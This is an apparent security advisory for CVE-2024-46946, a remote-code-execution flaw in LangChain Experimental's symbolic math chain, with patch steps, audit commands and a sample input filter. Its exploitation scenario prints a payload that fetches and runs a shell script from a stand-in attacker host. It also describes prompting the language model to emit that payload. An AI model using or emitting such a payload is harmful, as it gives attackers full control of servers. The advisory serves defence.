CVE-2024-46946: LangChain-Experimental: RCE via eval in math chain
CRITICAL | PoC available | CISA SSVC: Attend

Any application using LangChain Experimental's LLMSymbolicMathChain is exposed to unauthenticated remote code execution (CVSS 9.8). A public exploit exists. Patch immediately to a version above 0.3.0 or disable this chain; there is no safe workaround if the chain is exposed to untrusted input.
Risk Assessment
Severity is maximum: network-accessible, no authentication, no user interaction, public PoC available on GitHub. The vulnerability is trivial to exploit — sympy.sympify() internally calls eval() on user-influenced strings, meaning any attacker who can reach the endpoint can run arbitrary OS commands with the process's privileges. Exposure is broad because LangChain Experimental is widely adopted in AI agent prototypes and internal tools, many of which lack perimeter controls.
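To make the eval() exposure concrete, here is a minimal, benign illustration of the eval-injection class (CWE-95) underlying this CVE. The payload is a harmless stand-in for the os.system(...) strings used in the public PoC; this is a sketch of the vulnerability class, not the exploit itself.

```python
# Any attacker-controlled string that reaches eval() can import modules
# and run arbitrary Python. sympy.sympify() hands user-influenced
# strings to this same mechanism.
payload = "__import__('os').getpid()"  # benign stand-in for a real payload

result = eval(payload)  # the os module call actually executes
print(type(result).__name__)  # int
```

The same pattern with os.system(...) in place of os.getpid() is what turns a "math expression" into full command execution.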
Affected Systems
| Package | Ecosystem | Vulnerable Range | Patched |
|---|---|---|---|
| langchain-experimental | pip | >= 0.1.17, <= 0.3.0 | > 0.3.0 |

If you use langchain-experimental 0.1.17 through 0.3.0, you are affected.
Recommended Action
1. PATCH: Upgrade langchain-experimental to a version above 0.3.0 immediately.
2. AUDIT: Inventory all applications importing LLMSymbolicMathChain; grep the codebase for 'LLMSymbolicMathChain' and 'langchain_experimental'.
3. DISABLE: If an upgrade is not immediately possible, remove or disable LLMSymbolicMathChain in all agent configurations.
4. ISOLATE: Run LangChain services in sandboxed environments (containers with minimal OS capabilities, no outbound internet, dropped capabilities).
5. DETECT: Alert on unexpected subprocess spawns, outbound connections, or filesystem writes from LangChain process PIDs.
6. VERIFY: Confirm remediation by checking the installed package version: pip show langchain-experimental.
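The audit and verify steps above can be run directly from a shell at the repository root. The commands assume a Python codebase checked out locally and pip managing the environment; adapt paths and package managers to your setup.

```shell
# Audit: locate any use of the vulnerable chain in the codebase
grep -rln "LLMSymbolicMathChain" --include="*.py" .
grep -rln "langchain_experimental" --include="*.py" .

# Verify: confirm the installed version is above 0.3.0
pip show langchain-experimental | grep -i '^version'
```

An empty grep result for both patterns, plus a version above 0.3.0 (or the package absent entirely), indicates remediation.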
CISA SSVC Assessment
Source: CISA Vulnrichment (SSVC v2.0). Decision: Attend, based on the CISA Coordinator decision tree.
Frequently Asked Questions
What is CVE-2024-46946?
CVE-2024-46946 is an unauthenticated remote code execution vulnerability (CVSS 9.8) in LangChain Experimental's LLMSymbolicMathChain: user-influenced strings reach sympy.sympify(), which internally calls eval(). A public exploit exists. Patch to a version above 0.3.0 or disable the chain; there is no safe workaround if the chain is exposed to untrusted input.
Is CVE-2024-46946 actively exploited?
Proof-of-concept exploit code is publicly available for CVE-2024-46946, increasing the risk of exploitation.
How to fix CVE-2024-46946?
1. PATCH: Upgrade langchain-experimental to a version above 0.3.0 immediately. 2. AUDIT: Inventory all applications importing LLMSymbolicMathChain — grep codebase for 'LLMSymbolicMathChain' and 'langchain_experimental'. 3. DISABLE: If upgrade is not immediately possible, remove or disable LLMSymbolicMathChain from all agent configurations. 4. ISOLATE: Run LangChain services in sandboxed environments (containers with minimal OS capabilities, no outbound internet, drop capabilities). 5. DETECT: Alert on unexpected subprocess spawns, outbound connections, or file system writes from LangChain process PIDs. 6. VERIFY: Confirm remediation by checking installed package version: pip show langchain-experimental.
What systems are affected by CVE-2024-46946?
This vulnerability affects the following AI/ML architecture patterns: agent frameworks, LangChain pipelines, math reasoning chains, LLM-powered API backends, internal AI tooling.
What is the CVSS score for CVE-2024-46946?
CVE-2024-46946 has a CVSS v3.1 base score of 9.8 (CRITICAL). The EPSS exploitation probability is 0.66%.
Technical Details
NVD Description
langchain_experimental (aka LangChain Experimental) 0.1.17 through 0.3.0 for LangChain allows attackers to execute arbitrary code through sympy.sympify (which uses eval) in LLMSymbolicMathChain. LLMSymbolicMathChain was introduced in fcccde406dd9e9b05fc9babcbeb9ff527b0ec0c6 (2023-10-05).
Exploitation Scenario
An attacker targets a public-facing AI chatbot or internal math-reasoning API built with LangChain. They craft a prompt that causes the LLM to output a valid-looking but malicious sympy expression such as '__import__("os").system("curl attacker.com/shell.sh|sh")'. LLMSymbolicMathChain passes this string to sympy.sympify(), which internally calls eval(), executing the payload with the server process's privileges. No credentials or special knowledge are required; the public PoC makes exploitation trivial. A successful exploit yields full server compromise, data exfiltration, or lateral movement into the AI infrastructure.
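For defense in depth while an upgrade is rolled out, LLM output can be pre-filtered before it ever reaches sympy. The sketch below is a hypothetical allowlist filter (SAFE_EXPR and is_plausibly_safe are illustrative names, not part of LangChain or sympy); it reduces exposure but is not a substitute for patching, since allowlist bypasses are always possible.

```python
import re

# Hypothetical pre-filter: accept only characters plausible in a math
# expression, and reject dunder names outright, before calling sympify().
SAFE_EXPR = re.compile(r"^[0-9a-zA-Z_+\-*/^(). ]+$")

def is_plausibly_safe(expr: str) -> bool:
    # Dunder names like __import__ are how eval payloads escape the
    # expression sandbox, so "__" is rejected even if the charset passes.
    return bool(SAFE_EXPR.match(expr)) and "__" not in expr

print(is_plausibly_safe("sin(x) + 2**3"))    # True
print(is_plausibly_safe("__import__('os')")) # False (quotes and dunder)
```

Even with such a filter in place, the chain should still be disabled or upgraded: the filter only narrows the attack surface, it does not remove the eval() sink.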
Weaknesses (CWE)
CWE-95: Improper Neutralization of Directives in Dynamically Evaluated Code ('Eval Injection')
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

References
- cwe.mitre.org/data/definitions/95.html (Not Applicable)
- docs.sympy.org/latest/modules/codegen.html (Technical)
- gist.github.com/12end/68c0c58d2564ef4141bccd4651480820 (Exploit, 3rd Party)
- github.com/langchain-ai/langchain/releases/tag/langchain-experimental%3D%3D0.3.0 (Release)
- github.com/fkie-cad/nvd-json-data-feeds (Exploit)
Timeline
2023-10-05: LLMSymbolicMathChain introduced (commit fcccde406dd9e9b05fc9babcbeb9ff527b0ec0c6).
Related Vulnerabilities
- CVE-2025-2828 (10.0) LangChain RequestsToolkit: SSRF exposes cloud metadata. Same package: langchain.
- CVE-2023-34541 (9.8) LangChain: RCE via unsafe load_prompt deserialization. Same package: langchain.
- CVE-2023-29374 (9.8) LangChain: RCE via prompt injection in LLMMathChain. Same package: langchain.
- CVE-2023-34540 (9.8) LangChain: RCE via JiraAPIWrapper crafted input. Same package: langchain.
- CVE-2023-36258 (9.8) LangChain: unauthenticated RCE via code injection. Same package: langchain.